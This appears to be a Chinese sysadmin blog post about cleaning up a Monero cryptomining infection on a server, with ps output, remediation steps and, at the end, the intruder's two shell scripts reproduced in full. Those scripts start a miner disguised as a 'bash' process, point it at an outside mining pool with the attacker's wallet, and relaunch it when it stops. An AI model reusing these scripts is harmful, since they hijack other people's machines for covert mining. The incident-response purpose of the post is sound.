【***处理】服务器遭遇挖矿程序***后的处理

早上。
开发反应对外客户服务器环境异常
空间存储异常 90个G的空间莫名其妙少了70个G
TOP进程异常 多了一个MD和一个BASH为名的进程 分别跑了90-110的cpu
感觉像是系统正常进程 问了开发 开发表示不是正常业务程序，所以百度了进程中的IP地址。发现是一个常见的挖矿***IP，根据***IP百度得知是门罗币挖矿程序。

根据PID找到该进程
[root@bogon ~]# ps -ef|grep 46413
root 46413 1 99 Jan08 ? 56-04:22:04 -bash -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x
root 80119 79985 0 10:06 pts/1 00:00:00 grep 46413
[root@bogon ~]# ps -ef|grep 47002
root 47002 1 95 Jan08 ? 53-22:30:57 bash -c 1 -t 2 -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:[email protected]:3333/xmr

根据之前遭遇过比特币挖矿程序***案例处理经验，首先Kill掉这两个进程，然后查看定时任务中的陌生任务并做清理 清理完成后 存储空间恢复正常 CPU恢复正常

第二天会再次查看 如果进程再次出现，根据其他挖矿程序处理经验：找出执行文件取消执行授权 ，删掉文件， 清理进程，清理定时任务 （操作顺序不要乱）
如果还是异常 清理掉文件后 更换root密码 开启防火墙对***Ip做限制 找出其***方式并做相对防御

当天下午记录：出现这种问题最好排查整个网段的机器 这次的程序***就在整个网段的机器中都发现了 都做了清理

如果还想做安全防御方面的工作:除了开启防火墙更换root密码外
还可以 排查陌生用户账号密码 针对***方式做研究（是业务程序有漏洞还是用的服务工具有漏洞） 避免再次被***

以下是这个程序涉及的脚本文件供参考（说实话Low的一B）
脚本一：vim ./run
#!/bin/bash

proc=nproc
ARCH=uname -m
HIDE=”bash”

if [ “$ARCH” == “i686” ]; then
./h32 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:[email protected]:3333/xmr >>/dev/null &
elif [ “$ARCH” == “x86_64” ]; then
./h64 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:[email protected]:3333/xmr >>/dev/null &
fi
echo $! > bash.pid

脚本二：vim /tmp/hsperfdata_data_root/upd
#!/bin/sh
if test -r /tmp/hsperfdata_data_root/bash.pid; then
pid=$(cat /tmp/hsperfdata_data_root/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
./run &>/dev/null